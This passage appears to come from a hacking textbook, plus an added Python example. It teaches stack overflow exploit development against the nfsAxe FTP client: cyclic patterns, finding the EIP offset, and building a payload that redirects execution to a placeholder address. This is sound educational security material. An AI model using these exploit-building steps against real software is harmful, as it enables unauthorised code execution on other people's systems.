Calculating the EIP offset with the Metasploit toolset

Head on over to the tools directory in Metasploit with cd /usr/share/metasploit-framework/tools (newer Framework releases keep these scripts under tools/exploit/). First, let's generate a 4,000-byte payload, as we already know from the crash that this is enough to overwrite the saved return address:

# ./pattern_create.rb -l 4000 > /root/fuzz.txt

After a couple of seconds, this new text file will appear in root's home directory. If you open it up, you'll see 4,000 bytes of what looks like junk. Don't be so fast to judge, though: it's a cyclic pattern (Aa0Aa1Aa2...) in which every aligned 4-byte sequence is unique, which is exactly what lets the offset finder, pattern_offset.rb, map the value that lands in EIP back to a position in the buffer.

Now, open your fuzzer with Vim again and comment out the lines that take input and set the fuzz variable. Add these lines after the commented-out ones (the relative path assumes you run the script from /root, where the file was written):

with open("fuzz.txt") as fuzzfile:
    fuzz = fuzzfile.read().rstrip("\n")

Note that rstrip("\n") simply trims the trailing newline that pattern_create.rb leaves at the end of the file, so the payload is exactly 4,000 bytes and not 4,001:

Save your modified fuzzer and execute it again. You'll notice the payload is now 4,000 bytes long. But hold your horses: let's not fire it at the FTP client just yet (we already know it'll crash). As we reviewed in Chapter 9, Weaponizing Python, let's attach WinDbg to our FTP client: while the nfsAxe client is running, open a command prompt and find the FTP client's PID with tasklist. When you have it (3304 in our example), execute windbg -p 3304 -g to attach WinDbg to the process and let it keep running:

Now, you're ready to connect to the fuzzer. After the 4,000 bytes are received by the client, it crashes – but we can see the EIP register is overwritten with 0x43387143. The manual fuzzer in you is anticipating something like 0x41414141 or 0x7a7a7a7a, but don't forget that we're using a unique pattern to find our offset, shown as follows:

I know what the hacker in you is saying right now: we're on an Intel processor, so that's a little-endian EIP address, isn't it? Not bad, young apprentice. The register displays the value with the most significant byte first, but the bytes as they sit in memory (and in our pattern) are 43 71 38 43. A quick lookup on a hexadecimal ASCII table turns those into the pattern fragment Cq8C. Hold on to that value for the offset calculation with pattern_offset.rb (the script will also accept the raw 8-digit register value, 43387143, and reverse the bytes for you):

# ./pattern_offset.rb --length 4000 --query Cq8C

As you can see, pattern_offset.rb regenerates the same pattern for the length you gave pattern_create.rb and reports where the query string sits inside it: in our case, 2064. Sanity-check the result before you use it: it must be less than the pattern length minus 4, and a query that matches more than once means the pattern was longer than its 20,280-byte period and should be shortened.

I know what you're wondering because I wondered the same thing: does the offset include the 4 bytes that overwrite the return address? In other words, if the offset is found to be 2,064 bytes, do we need to put in 2,060 bytes of fluff? Once again, the friendly neighborhood hackers at Metasploit considered that and decided to make it consistent: the offset is the number of bytes before the 4 that land in EIP, so what you see is what you need in your exploit code, with no subtraction. So, we'll go back to our Python script one more time, multiply our junk byte by the exact offset value discovered by pattern_offset, and then concatenate the 4-byte little-endian encoding of the address to which execution will flow (0xdeadbeef here, written as ef be ad de):

fuzz = '\x7a' * 2064 + '\xef\xbe\xad\xde'

Fire it off one more time and watch EIP, which should now read 0xdeadbeef (the same value appears as the Exception Offset in the Windows error message). Congratulations! You have all the pieces needed to construct a working exploit:
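To make the mechanics behind pattern_create.rb and pattern_offset.rb concrete, here is an added example, not code from the book or from the Metasploit project, that re-implements the cyclic pattern in Python, resolves the EIP value WinDbg showed (0x43387143) back to its offset, and builds the final payload the way the fuzz line above does. The function names pattern_create, pattern_offset and build_payload, and the optional total_len padding, are this example's own choices; the pattern alphabet, the 4,000-byte length, the EIP value and the 0xdeadbeef placeholder address are taken from the text.

```python
import string
import struct

# The Metasploit cyclic pattern: every triplet is UPPER + lower + digit,
# so the stream reads Aa0Aa1Aa2...Aa9Ab0...Zz9 and repeats after 20280 bytes.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
CYCLE_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280


def pattern_create(length):
    """Return `length` bytes of the same pattern pattern_create.rb -l emits.

    Every aligned 4-byte window in the first 20280 bytes is unique, which is
    what makes the value in EIP recoverable as an offset.  Past that the
    pattern repeats and an offset is no longer unambiguous.
    """
    cycle = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    cycle = cycle.encode()
    repeats = length // CYCLE_LEN + 1
    return (cycle * repeats)[:length]


def pattern_offset(pattern, query):
    """Mirror of pattern_offset.rb -q: find where `query` sits in `pattern`.

    `query` may be the four ASCII characters read off the register
    ("Cq8C" or b"Cq8C") or the register value itself as 8 hex digits
    ("43387143" or "0x43387143").  x86 is little-endian, so a hex value is
    packed with '<I' to recover the byte order in memory: 43 71 38 43.
    """
    if isinstance(query, str):
        q = query[2:] if query.lower().startswith("0x") else query
        if len(q) == 8 and all(c in string.hexdigits for c in q):
            needle = struct.pack("<I", int(q, 16))
        else:
            needle = query.encode()
    else:
        needle = bytes(query)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("query %r does not occur in the pattern" % (query,))
    if pattern.find(needle, idx + 1) >= 0:
        raise ValueError("query %r occurs more than once; use a shorter pattern" % (query,))
    return idx


def build_payload(offset, ret_addr, filler=b"\x7a", total_len=None):
    """Build filler * offset + little-endian return address.

    The offset pattern_offset reports is the number of bytes *before* the
    four that land in EIP, so it is used as-is (no subtracting 4).  When
    total_len is given the payload is padded with filler so its length
    matches the buffer that produced the crash.
    """
    payload = filler * offset + struct.pack("<I", ret_addr)
    if total_len is not None and total_len > len(payload):
        payload += filler * (total_len - len(payload))
    return payload


if __name__ == "__main__":
    pat = pattern_create(4000)
    # Value WinDbg showed in EIP when the 4000-byte pattern crashed the client.
    off = pattern_offset(pat, "43387143")
    print("EIP offset:", off)                                     # 2064
    payload = build_payload(off, 0xDEADBEEF, total_len=4000)
    print("bytes that land in EIP:", payload[off:off + 4].hex())  # efbeadde
```

The duplicate check in pattern_offset is the caveat the Ruby tool leaves to you: once a pattern exceeds one 20,280-byte period, a 4-byte query can match at two offsets and the result is meaningless, so either shorten the pattern or use pattern_create.rb's -s option to change the character sets.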
